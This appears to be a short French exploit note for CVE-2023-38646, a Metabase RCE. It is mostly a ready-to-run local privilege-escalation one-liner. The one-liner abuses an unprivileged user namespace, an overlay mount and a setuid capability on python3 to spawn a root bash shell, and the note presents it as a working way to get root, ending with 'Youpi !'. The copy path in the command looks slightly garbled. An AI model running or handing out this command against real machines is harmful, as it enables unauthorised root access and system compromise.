
Exploit pour CVE-2023-38646 ciblant une RCE sur Metabase avec un payload d'élévation de privilèges pour obtenir un accès root via les techniques unshare et setuid.
Pour obtenir l'utilisateur root de la machine ou du système selon les informations ci-dessus, cette commande et ce fichier permettront d'accéder à l'utilisateur root.
Vous pouvez exécuter cette commande directement ou l'exécuter en tant que fichier. Commande : $unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'
Fichier exécuté : $./exploitsh.sh
Youpi !